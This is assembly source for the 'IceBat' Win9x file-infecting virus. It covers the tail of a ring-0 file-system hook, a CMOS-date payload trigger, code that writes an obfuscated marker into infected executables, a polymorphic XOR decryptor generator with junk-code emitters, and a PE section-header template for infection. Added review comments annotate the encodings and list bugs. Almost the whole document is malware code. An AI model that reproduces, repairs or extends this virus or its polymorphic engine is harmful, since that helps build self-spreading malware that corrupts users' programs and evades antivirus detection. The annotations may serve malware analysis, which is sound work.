📄 codes的icebat(1.01 alpha)原代码 ——win9x virus.txt
LEA ESI,EBP[VIR_ENCRY_START-MYHOOKAPI]
CALL EDI
; Change Dos Sub Header Message!
CALL CHECKTRIGGER
OR EAX,EAX
JZ CLOSEFILE
MOV EAX,R0_WRITEFILE
XOR ECX,ECX
INC ECX
INC ECX
INC ECX
INC ECX
LEA ESI,EBP[PESTART-MYHOOKAPI]
MOV DWORD PTR [ESI],20202020H
MOV EDX,04EH
CALL EDI
CALL NOTMSG
MOV EAX,R0_WRITEFILE
MOV ECX,14
LEA ESI,EBP[MSG-MYHOOKAPI]
MOV EDX,04EH+04H
CALL EDI
CALL NOTMSG
CLOSEFILE:
MOV EAX,R0_CLOSEFILE ; 关档
CALL EDI
RETURN_ATTRIB:
MOV EAX,DR3 ; 恢复文件属性
MOV ECX,EAX
MOV AX,R0_FILEATTRIBUTES+1
LEA ESI,EBP[BUF-MYHOOKAPI]
CALL EDI
EXIT_INFECT:
CANCELACTION:
MOV BYTE PTR EBP[MYFLAG-MYHOOKAPI],0 ; 设置忙位为零
MOV EAX,EBP[OLDHOOKAPI-MYHOOKAPI] ; 得到旧的 FILESYSTEMAPIHOOK 入口
MOV DR1,EAX ; 暂存到 DR1
POPAD ; 全局出栈
MOV EAX,DR1 ; 将 DR1 ( 旧的 FILESYSTEMAPIHOOK ) 返回 EAX
JMP [EAX] ; 跳到 OLD FILESYSTEMAPIHOOK
;================================
; SOME USEFUL FUNCTIONS
;================================
;-----------------------------------------------------------------------
; FILEOP - file-operation thunk. Callers load EAX with an R0_* function
; code (R0_WRITEFILE, R0_CLOSEFILE, R0_FILEATTRIBUTES above) plus the
; service's other register arguments and then call here; the visible
; call sites do CALL EDI, which presumably holds this address (confirm
; in the part of the hook that is not in this listing).
; The INT 20H + DD pair is the VxD dynamic-link call form: the dword
; names device 0040h (IFSMgr) / service 0032h, i.e. IFSMgr_Ring0_FileIO
; per the original comment. Only meaningful at ring 0 on Win9x.
;-----------------------------------------------------------------------
FILEOP: ; file-operation helper
INT 20H ; VxD dynamic-link call; the following DD is the service id
DD 00400032H ; IFSMgr_Ring0_FileIO (device 0040h, service 0032h)
RET
;===============================================
;-----------------------------------------------------------------------
; NOTMSG - invert the 14-byte MSG buffer in place (one's complement of
; every byte). MSG is stored NOT-encoded in the data area; because NOT
; is its own inverse, one call yields plaintext and a second call
; restores the obfuscated form. The write path above calls it once
; before writing MSG into the host and once after, so the resident copy
; never stays in clear.
; In:    EBP = delta base (MSG is reached as EBP[MSG-MYHOOKAPI])
; Out:   MSG inverted in place. All registers preserved (PUSHAD/POPAD);
;        flags clobbered (POPAD does not restore EFLAGS).
; The literal 14 must match the length of the MSG definition.
;-----------------------------------------------------------------------
NOTMSG:
PUSHAD
LEA ESI,EBP[MSG-MYHOOKAPI] ; source = MSG
MOV EDI,ESI ; destination = the same buffer (in place)
XOR ECX,ECX ; byte counter
CLD ; LODSB/STOSB walk forward
LOOPNOT:
LODSB
NOT AL
STOSB
INC ECX
CMP ECX,14 ; 14 = sizeof MSG; keep in sync with the MSG definition
JNZ LOOPNOT
POPAD
RET
;===============================================
;-----------------------------------------------------------------------
; CHECKTRIGGER - payload date test. Reads day-of-month and month straight
; from the CMOS RTC (ring-0 port I/O on 70h/71h, no OS call) and compares
; them with the assembly-time constants TRIGGERDAY / TRIGGERMON, which are
; defined outside this listing.
; Out:   EAX = 1 on the trigger date, 0 otherwise. Clobbers EAX, flags.
; NOTE(review): CMOS registers 07h/08h are normally BCD unless the RTC has
; been switched to binary mode, so TRIGGERDAY/TRIGGERMON presumably have
; to be BCD-encoded (12h for the 12th) - confirm against their definition.
; The routine does not wait for the RTC update-in-progress bit, so a read
; that straddles a clock update may return a stale value, and writing the
; index to port 70h with bit 7 clear also re-enables NMI as a side effect.
;-----------------------------------------------------------------------
CHECKTRIGGER: ; returns 1 on the trigger date, else 0
MOV AL,07H ; CMOS index 07h = day of month
OUT 70H,AL
IN AL,71H
CMP AL,TRIGGERDAY ; AL = today's day of month
JNZ EXIT_TRIGGER
MOV AL,08H ; CMOS index 08h = month
OUT 70H,AL
IN AL,71H
CMP AL,TRIGGERMON ; AL = current month
JNZ EXIT_TRIGGER
XOR EAX,EAX ; both matched -> return 1
INC EAX
RET
;================================
; END OF TRIGGER
;================================
EXIT_TRIGGER: ; no match -> return 0
XOR EAX,EAX
RET
;================================
;-----------------------------------------------------------------------
; ENCRYATION_MYSELF - write an XOR-encrypted copy of the virus body.
; Copies the VIRSIZE-VIRSTART bytes in [VIRSTART, VIRSIZE) - the resident
; code plus MSG/OLDHOOKAPI/MYFLAG - to the address held in VIR_CODE_START,
; XORing every byte with the one-byte key XOR_CODE. Both variables are
; filled in by ENCRYATION_VIR (VIR_CODE_START points just past the
; decryptor it generated, so the body lands directly behind it).
; In:    EBP = delta base; VIR_CODE_START = destination pointer (read as
;        a value with MOV, unlike the LEA for the source); XOR_CODE = key.
; Out:   encrypted image at [VIR_CODE_START]. Registers preserved by
;        PUSHAD/POPAD; flags clobbered.
; NOTE(review): no CLD here, so it depends on the caller leaving DF clear;
; no bounds check on the destination buffer.
;-----------------------------------------------------------------------
ENCRYATION_MYSELF:
PUSHAD
MOV EDI,EBP[VIR_CODE_START-MYHOOKAPI] ; EDI = destination pointer stored by ENCRYATION_VIR
LEA ESI,EBP[VIRSTART-MYHOOKAPI] ; ESI = first byte of the plaintext body
MOV ECX,OFFSET VIRSIZE-VIRSTART ; byte count
ENCRY_NEXT_BYTE:
LODSB
XOR AL,BYTE PTR EBP[XOR_CODE-MYHOOKAPI] ; single repeating key byte
STOSB
DEC ECX
OR ECX,ECX ; redundant: DEC already sets ZF
JNZ ENCRY_NEXT_BYTE
POPAD
RET
;================================
; ENCRYPTION: build the polymorphic decryptor for the virus body
; Entry parameter:
; ECX - RVA of the infected file location (INFECT FILE RVA)
;================================
;-----------------------------------------------------------------------
; ENCRYATION_VIR - polymorphic decryptor generator.
; Emits into the VIR_ENCRY_START buffer a small decryption loop, padded
; with junk from MADE_SPAN_FLAG / MADE_SPAN, and records where the
; encrypted body has to follow it. Reading the opcode bytes emitted below,
; the loop it builds is:
;        XOR  reg,reg                     ; reg = ESI or EDI (USE_REG)
;   top: XOR  BYTE PTR [reg+disp32],key   ; disp32 back-patched at the end
;        INC  reg
;        CMP  reg,VIRSIZE-VIRSTART
;        JNZ  top
; In:    ECX = location of the body in the infected host (banner says RVA)
;        EBP = delta base
; Out:   XOR_CODE         = random, never-zero key byte
;        USE_REG          = 0 (ESI) / 1 (EDI)
;        JUMP_BEGIN       = address of "top" inside the buffer
;        USED_OFFSET      = address of the disp32 slot (patched last)
;        VIR_CODE_START   = address just past the decryptor
;        VIR_ENCRY_LENGTH = decryptor length + (VIRSIZE-VIRSTART)
;        disp32 in the XOR = ECX + decryptor length
; Clobbers: EAX, EBX, ECX, ESI, EDI, flags, plus whatever RND clobbers.
; NOTE(review): [reg+disp32] is an absolute memory operand, so the value
; that ends up in disp32 has to be the address at which the body is
; mapped (image base + RVA); a bare RVA would hit the wrong memory.
; Confirm what the caller puts in ECX.
; NOTE(review): the JNZ displacement is computed from EDI *before* the
; 6-byte 0F 85 rel32 is stored, so the encoded target resolves to
; JUMP_BEGIN+6 rather than JUMP_BEGIN; unless MADE_SPAN_FLAG (not in this
; listing) compensates, the back-edge lands inside the junk emitted right
; after JUMP_BEGIN.
; NOTE(review): VIR_ENCRY_START is 1000h bytes and nothing checks that
; decryptor + body fit. RND is a stub in this listing, so as published the
; "random" choices are whatever AL/AX happened to hold.
;-----------------------------------------------------------------------
ENCRYATION_VIR:
CLD ; every STOS* below must advance EDI
CALL RND ; key byte in AL ...
OR AL,AL
JNZ RND_NUM_OK
DEC AL ; ... but never 0 (a zero key leaves the body in clear); 0 -> 0FFh
RND_NUM_OK:
MOV BYTE PTR EBP[XOR_CODE-MYHOOKAPI],AL
LEA EDI,EBP[VIR_ENCRY_START-MYHOOKAPI] ; EDI = output cursor into the build buffer
CALL RND ; index register choice: bit 0 -> 0 = ESI, 1 = EDI
AND AL,01H
OR AL,AL
JZ SET_ESI
MOV BYTE PTR EBP[USE_REG-MYHOOKAPI],AL ; USE EDI (both arms store AL; the branch is cosmetic)
JMP NEXT1
SET_ESI:
MOV BYTE PTR EBP[USE_REG-MYHOOKAPI],AL ; USE ESI
NEXT1:
CALL MADE_SPAN_FLAG ; junk prologue (MADE_SPAN_FLAG is defined outside this listing)
CALL MADE_SPAN_FLAG
CALL MADE_SPAN
CMP BYTE PTR EBP[USE_REG-MYHOOKAPI],0
JZ INIT_ESI
MOV AX,0FF33H ; emits 33 FF = XOR EDI,EDI
STOSW
JMP NEXT2
INIT_ESI:
MOV AX,0F633H ; emits 33 F6 = XOR ESI,ESI
STOSW
NEXT2:
CALL MADE_SPAN_FLAG ; junk
CALL MADE_SPAN
MOV DWORD PTR EBP[JUMP_BEGIN-MYHOOKAPI],EDI ; loop top: the JNZ at the end is meant to come back here
CALL MADE_SPAN_FLAG ; junk between the loop top and the XOR
CALL MADE_SPAN
CALL MADE_SPAN_FLAG
;CALL MADE_DISCRYATION_CODE
MOV AL,80H ; 80 /6 ib = XOR BYTE PTR r/m8,imm8
STOSB
MOV AL,0B6H ; ModRM B6 = [ESI+disp32], B7 = [EDI+disp32]
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI]
STOSB
MOV DWORD PTR EBP[USED_OFFSET-MYHOOKAPI],EDI ; remember the disp32 slot; back-patched at the end
STOSD ; placeholder disp32 (whatever EAX holds right now)
MOV AL,BYTE PTR EBP[XOR_CODE-MYHOOKAPI] ; imm8 = the key
STOSB
CALL MADE_SPAN_FLAG ; junk
CALL MADE_SPAN
;CALL INC ESI OR EDI
MOV AL,046H ; 46 = INC ESI, 47 = INC EDI
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI]
STOSB
NEXT3:
CALL MADE_SPAN ; junk
CALL MADE_SPAN_FLAG
;CALL MADE_LOOP
MOV AL,081H ; 81 /7 id = CMP r/m32,imm32
STOSB
MOV AL,0FEH ; ModRM FE = ESI, FF = EDI
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI]
STOSB
MOV EAX,OFFSET VIRSIZE-VIRSTART ; imm32 = bytes to decrypt
STOSD
MOV EBX,DWORD PTR EBP[JUMP_BEGIN-MYHOOKAPI] ; rel32 = JUMP_BEGIN - EDI, taken before the 6-byte JNZ is written
SUB EBX,EDI
MOV AX,850FH ; emits 0F 85 = JNZ rel32
STOSW
MOV EAX,EBX
STOSD
MOV EBP[VIR_CODE_START-MYHOOKAPI],EDI ; encrypted body goes right after the decryptor
LEA ESI,EBP[VIR_ENCRY_START-MYHOOKAPI]
SUB EDI,ESI ; EDI = decryptor length in bytes
MOV DWORD PTR EBP[VIR_ENCRY_LENGTH-MYHOOKAPI],OFFSET VIRSIZE-VIRSTART
ADD EBP[VIR_ENCRY_LENGTH-MYHOOKAPI],EDI ; total = decryptor + body
ADD ECX,EDI ; ECX = input location + decryptor length = where the body sits in the host
MOV EDI,EBP[USED_OFFSET-MYHOOKAPI]
MOV [EDI],ECX ; back-patch the XOR's disp32
RET
;===================================
; GET RND NUMBER => AX
;===================================
;-----------------------------------------------------------------------
; RND - random-number source for the engine; the banner above gives the
; contract as "result in AX". Not implemented in this listing: the body is
; a bare RET and the original comment reads "add your own". As published,
; every caller therefore sees AL/AX unchanged from what it already held,
; the key / register / junk choices are not random at all, and the
; RND_SEED byte in the data area is never touched.
;-----------------------------------------------------------------------
RND:
; stub - "add your own" in the original
RET
;=====[ MADE SPAN FLAG ITEM ]=======
;-----------------------------------------------------------------------
; MADE_SPAN_FLAG_ITEM - emit one junk instruction that MAY alter EFLAGS.
; In:  EDI = output cursor (advanced by STOS*). Out: EDI advanced.
; Clobbers: EAX, EBX, flags, plus whatever RND clobbers.
; Selector: AND AL,04H keeps bit 2 only, so AL is 0 or 4. Only MSF_GROUP1
; (AL=0) and the bare RET (AL=4, emits nothing) are reachable;
; MSF_GROUP2/3/4 are dead as written (presumably AND AL,03H was intended).
; The same masking pattern recurs in the sub-selectors, so the instruction
; set actually produced is narrower than the labels suggest.
; Encodings (opcode comments below checked against the bytes stored):
;   GROUP1: 81 /r id  -> SUB/ADD/ADC/SBB ECX|EBX,imm32
;   GROUP2: F7 D8+r NEG r32 ; 40+r INC r32 ; 48+r DEC r32   [unreachable]
;   GROUP3: DAA/DAS/AAA/AAS/AAM/AAD                          [unreachable]
;   GROUP4: 81 F1|F3 id -> XOR ECX|EBX,imm32                 [unreachable]
;-----------------------------------------------------------------------
MADE_SPAN_FLAG_ITEM:
CALL RND ; selector; AND 04H leaves bit 2 only -> AL is 0 or 4
AND AL,04H
OR AL,AL
JZ MSF_GROUP1 ; AL=0: the only group that is actually reached
CMP AL,01 ; AL=1..3 cannot occur after AND AL,04H
JZ MSF_GROUP2
CMP AL,02
JZ MSF_GROUP3
CMP AL,03
JZ MSF_GROUP4
RET ; AL=4: emit nothing
MSF_GROUP1: ; 81 /r id: SUB/ADD/ADC/SBB ECX|EBX,imm32
MOV AL,81H
STOSB
CALL RND ; AND 03H -> 0..3 picks the ALU operation
AND AL,03H
OR AL,AL
JNZ GROUP11
MOV BL,0E9H ;SUB ECX (ModRM 11 101 001)
JMP G11_CON
GROUP11:
CMP AL,01
JNZ GROUP12
MOV BL,0C1H ; ADD ECX (ModRM 11 000 001)
JMP G11_CON
GROUP12:
CMP AL,02
JNZ GROUP13
MOV BL,0D1H ; ADC ECX (ModRM 11 010 001)
JMP G11_CON
GROUP13:
MOV BL,0D9H ; SBB ECX (ModRM 11 011 001)
G11_CON:
CALL RND ; AND 02H -> +0 keeps ECX, +2 turns the rm field into EBX
AND AL,02H
ADD AL,BL
STOSB
CALL RND ; imm32 from two draws; assumes RND fills AX
SHL EAX,10H
CALL RND
STOSD
RET
MSF_GROUP2: ; unreachable (selector never yields 1)
CALL RND
AND AL,02H
OR AL,AL
JZ G21
CMP AL,01 ; never true after AND AL,02H, so G22 (DEC) would be dead as well
JZ G22
MOV AL,0F7H ; NEG EAX/ECX/EDX/EBX: F7 D8+r
STOSB
CALL RND
AND AL,03H
ADD AL,0D8H
STOSB
RET
G21:
CALL RND ; INC EAX/ECX/EDX/EBX: 40+r
AND AL,03H
ADD AL,040H
STOSB
RET
G22:
CALL RND ; DEC EAX/ECX/EDX/EBX: 48+r
AND AL,03H
ADD AL,48H
STOSB
RET
MSF_GROUP3: ; unreachable (selector never yields 2); BCD/ASCII-adjust one-byte ops
CALL RND
AND AL,05H ; -> 0,1,4,5: DAA, DAS, AAM, AAD; AAA/AAS (2,3) cannot be selected
OR AL,AL
JNZ G31
MOV AL,027H ; DAA
STOSB
RET
G31:
CMP AL,01
JNZ G32
MOV AL,02FH ; DAS
STOSB
RET
G32:
CMP AL,02
JNZ G33
MOV AL,037H ; AAA
STOSB
RET
G33:
CMP AL,03
JNZ G34
MOV AL,03FH ; AAS
STOSB
RET
G34:
CMP AL,04
JNZ G35
MOV AX,0AD4H ; AAM (D4 0A)
STOSW
RET
G35:
MOV AX,0AD5H ; AAD (D5 0A)
STOSW
RET
MSF_GROUP4: ; unreachable (selector never yields 3)
MOV AL,081H ; 81 /6 id: XOR ECX|EBX,imm32 (F1 = ECX, F3 = EBX; EDX is not produced despite the old comment)
STOSB
CALL RND
AND AL,02H
ADD AL,0F1H
STOSB
CALL RND ; imm32 from two draws
SHL EAX,10H
CALL RND
STOSD
RET
;===================================
; MADE CODE THAT DOES NOT
; MODIFY FLAGS ( 4 OPS )
;===================================
;-----------------------------------------------------------------------
; MADE_SPAN - emit four flag-neutral junk instructions by calling
; MADE_SPAN_ITEM four times. Every selector value MADE_SPAN_ITEM can
; actually take emits something, so this always adds exactly four
; instructions at the output cursor.
; In/Out: EDI = output cursor. Clobbers: EAX, flags (via RND / STOS*).
;-----------------------------------------------------------------------
MADE_SPAN:
CALL MADE_SPAN_ITEM
CALL MADE_SPAN_ITEM
CALL MADE_SPAN_ITEM
CALL MADE_SPAN_ITEM
RET
;===================================
;-----------------------------------------------------------------------
; MADE_SPAN_ITEM - emit one junk instruction that leaves EFLAGS alone.
; Selector: AND AL,05H keeps bits 0 and 2, so AL is 0,1,4 or 5:
;   0 -> MOV r,imm (MADE_MOV_ITEM), 1 -> XCHG EAX,r, 4 -> NOT r32,
;   5 -> CBW or NOP. The AL=2 (IN AL,imm8) and AL=3 branches are
;   unreachable - which matters for IN: it would be a port read inside the
;   host's user-mode entry code, where its outcome depends on the IOPL/IOPM
;   in effect rather than on this engine.
; Inside MS_MADE_CCN, AND AL,02 gives 0 or 2, so CWD (CCN1) is never
; produced either - only CBW or NOP.
; Encodings: 66 98 CBW, 66 99 CWD, 90 NOP, 91/93 XCHG EAX,ECX|EBX,
;            E4 ib IN AL,imm8, F7 D0+r NOT EAX/ECX/EDX/EBX.
; In/Out: EDI = output cursor. Clobbers: EAX, flags (via RND).
;-----------------------------------------------------------------------
MADE_SPAN_ITEM:
CALL RND ; selector; AND 05H keeps bits 0,2 -> AL is 0,1,4 or 5
AND AL,05H
OR AL,AL
JZ MS_MADE_MOV ; 0
CMP AL,01
JZ MS_MADE_XCHG ; 1
CMP AL,02
JZ MS_MADE_IN ; 2: unreachable
CMP AL,03
JZ MS_MADE_MOV ; 3: unreachable
CMP AL,04
JZ MS_MADE_NOT ; 4
CMP AL,05
JZ MS_MADE_CCN ; 5
RET
MS_MADE_CCN: ; CBW or NOP (AND 02 -> 0 or 2, so the CWD arm is dead)
CALL RND
AND AL,02
OR AL,AL
JNZ CCN1
MOV AX,9866H ; 66 98 = CBW (operand-size prefix on the CWDE opcode)
STOSW
RET
CCN1:
CMP AL,01 ; never true here
JNZ CCN2
MOV AX,9966H ; 66 99 = CWD
STOSW
RET
CCN2:
MOV AL,90H ; NOP
STOSB
RET
MS_MADE_MOV:
CALL MADE_MOV_ITEM
RET
MS_MADE_XCHG:
CALL RND ; 91+r with AND 02H -> 91 (XCHG EAX,ECX) or 93 (XCHG EAX,EBX); 92/EDX is skipped
AND AL,02H
ADD AL,91H
STOSB
RET
MS_MADE_IN: ; unreachable; would emit E4 ib = IN AL,imm8
MOV AL,0E4H ; IN AL,??
STOSB
CALL RND
STOSB
RET
MS_MADE_NOT:
MOV AL,0F7H ; F7 D0+r = NOT EAX/ECX/EDX/EBX (NOT leaves flags untouched)
STOSB
CALL RND
AND AL,03
ADD AL,0D0H
STOSB
RET
;===========[ MADE CODE MOV ]============
;-----------------------------------------------------------------------
; MADE_MOV_ITEM - emit one junk MOV reg,imm (MOV never touches flags).
; Selector: AND AL,02H gives 0 or 2. 0 -> B8+r id = MOV r32,imm32
; (r = EAX/ECX/EDX/EBX); 2 -> falls through MOV1 into MOV2: B0+r ib =
; MOV r8,imm8 (AL,CL,DL,BL,AH,CH,DH,BH). The 16-bit form at MOV1
; (66 B8+r iw) needs AL=1 and is unreachable.
; imm32 is assembled from two RND draws with SHL EAX,10H in between,
; which assumes RND returns a value in AX.
; In/Out: EDI = output cursor. Clobbers: EAX, flags (via RND).
;-----------------------------------------------------------------------
MADE_MOV_ITEM:
CALL RND ; selector; AND 02H -> 0 or 2
AND AL,02H
OR AL,AL
JNZ MOV1
CALL RND ; B8+r id = MOV EAX/ECX/EDX/EBX,imm32
AND AL,03H
ADD AL,0B8H
STOSB
CALL RND ; imm32 from two draws (assumes RND fills AX)
SHL EAX,10H
CALL RND
STOSD
RET
MOV1:
CMP AL,01 ; never true after AND AL,02H: the 16-bit form below is dead
JNZ MOV2
MOV AL,066H ; 66 B8+r iw = MOV AX/CX/DX/BX,imm16
STOSB
CALL RND
AND AL,03H
ADD AL,0B8H
STOSB
CALL RND
STOSW
RET
MOV2:
CALL RND ; B0+r ib = MOV AL/CL/DL/BL/AH/CH/DH/BH,imm8
AND AL,07H
ADD AL,0B0H
STOSB
CALL RND
STOSB
RET
;********************************
;* STATIC AND DYNAMIC DATA *
;********************************
; MSG: the 14-byte marker the hook writes into the host's DOS stub, kept
; NOT-encoded in memory ("ICeBaT 1.0,Tj$" once NOTMSG inverts it). The
; trailing '$' looks like a DOS INT 21h/AH=09h string terminator. The
; literal 14 in NOTMSG and in the write path must match this length.
MSG DB NOT('I'),NOT('C'),NOT('e'),NOT('B'),NOT('a'),NOT('T'),NOT(' '),NOT('1'),NOT('.'),NOT('0'),NOT(','),NOT('T'),NOT('j'),NOT('$')
OLDHOOKAPI DD 0 ; previous FileSystemApiHook entry; the hook exit path tail-jumps through it
MYFLAG DB 0 ; busy / re-entrancy flag; cleared to 0 on the hook's exit path
VIRSIZE = $ ; end of the body that is copied and encrypted: [VIRSTART, VIRSIZE)
;=========[ NEW SECTION ]==========
; NEWOBJ: 40-byte template laid out like IMAGE_SECTION_HEADER (8-byte
; Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
; 12 bytes of relocation/line-number fields, Characteristics).
NEWOBJ: ; header of the section added to the host
ONAME DD 0 ; Name, bytes 0-3
DD 0 ; Name, bytes 4-7
VIRTUALSIZE DD 0 ; VirtualSize
RVA DD 0 ; VirtualAddress
PHYSICALSIZE DD 0 ; SizeOfRawData
PHYSICALOFFSET DD 0 ; PointerToRawData
REVERSED DD 0,0,0 ; (sic: "reserved") PointerToRelocations, PointerToLinenumbers, NumberOf* word pair
OBJFLAGS DD 0 ; Characteristics
;=========[ MEMORY BUFFER ]==========
BUF DB 0FFH DUP(0) ; 255-byte file name / path buffer; also the ESI argument when attributes are restored
PESTART DD 0 ; file offset of the PE header; the DOS-stub overwrite above also uses it as a 4-byte scratch (20202020h)
OBJTABOFFSET DD 0 ; file offset of the section table
PEHEADER: ; buffer for the start of the PE headers; by byte count the named
; fields below sit at the standard IMAGE_NT_HEADERS32 offsets
PESIGN DD 0 ; +0  Signature
CPUTYPE DW 0 ; +4  Machine
NUMOBJ DW 0 ; +6  NumberOfSections
DB 3*4 DUP(0) ; +8  TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
NTHEADERSIZE DW 0 ; +20 SizeOfOptionalHeader
FLAGS DW 0 ; +22 Characteristics
DB 4*4 DUP(0) ; +24 Magic .. SizeOfUninitializedData
ENTRYPOINTRVA DD 0 ; +40 AddressOfEntryPoint
DB 2*4 DUP(0) ; +44 BaseOfCode, BaseOfData
IMAGEBASE DD 0 ; +52 ImageBase
OBJALIGN DD 0 ; +56 SectionAlignment
FILEALIGN DD 0 ; +60 FileAlignment
DB 4*4 DUP(0) ; +64 OS / image / subsystem versions, Win32VersionValue
IMAGESIZE DD 0 ; +80 SizeOfImage
HEADERSIZE DD 0 ; +84 SizeOfHeaders
OTHERBUF DB 500H DUP(0) ; extra room after the fields above (presumably the rest of the headers read in one go)
;=======[ USE FOR ENCRYATION ]=======
RND_SEED DB 0 ; seed for RND (the stub RND in this listing never touches it)
XOR_CODE DB 0 ; one-byte XOR key; ENCRYATION_VIR never lets it be 0
USE_REG DB 0 ; decryptor index register: 0 = ESI, 1 = EDI
VIR_CODE_START DD 0 ; pointer just past the generated decryptor, where ENCRYATION_MYSELF writes the body
USED_OFFSET DD 0 ; address of the disp32 slot in the generated XOR; back-patched last
JUMP_BEGIN DD 0 ; address of the decryptor loop top inside VIR_ENCRY_START
VIR_ENCRY_LENGTH DD 0 ; decryptor length + (VIRSIZE-VIRSTART)
VIR_ENCRY_START DB 1000H DUP(0) ; 4 KiB build buffer for decryptor + encrypted body; no overflow check
;********************************
;* END OF MY CUTE VIRUS DATAS *
;********************************
VIRMEMORYSIZE = $ ; total resident footprint, including the buffers above
VIRSEG ENDS
END VIRSTART